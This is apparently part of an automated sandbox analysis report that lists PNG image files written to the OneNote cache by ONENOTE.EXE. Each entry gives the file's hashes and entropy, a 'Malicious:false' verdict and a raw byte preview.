                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

                                                                                                  Download File
